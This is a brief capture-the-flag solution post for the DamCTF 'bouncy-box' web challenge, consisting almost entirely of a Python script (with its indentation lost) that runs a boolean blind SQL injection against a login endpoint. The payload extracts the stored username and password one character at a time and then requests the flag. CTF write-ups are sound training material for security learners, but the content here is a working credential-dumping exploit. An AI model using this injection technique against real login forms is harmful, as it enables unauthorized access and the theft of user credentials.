Tags: web
Rating: 5.0
my solution
```
import requests, string
s = requests.session()
url = 'https://bouncy-box.chals.damctf.xyz/login'
arr = ',' + string.printable
def blind_row(column,step):
for char in arr:
res = s.post(url,json={"username":f"admin' or ascii(substr((select {column} from users limit 1),{step},1))={ord(char)}-- -",
"password":"admin","score":0}).status_code
if res==200:
return char
return None
def rows(column):
row = ''
step = len(row) +1
while True:
char = blind_row(column,step)
if char == None:
return row
row += char
step += 1
print('[+] %s = '%column,row)
username = rows('username')
password = rows('password')
flag = s.post('https://bouncy-box.chals.damctf.xyz/flag',data={'username_input':username,'password_input':password}).text
print(flag)
```
[read detail](https://github.com/magnetohvcs/ctf/tree/main/damctf/web-bouncy-box)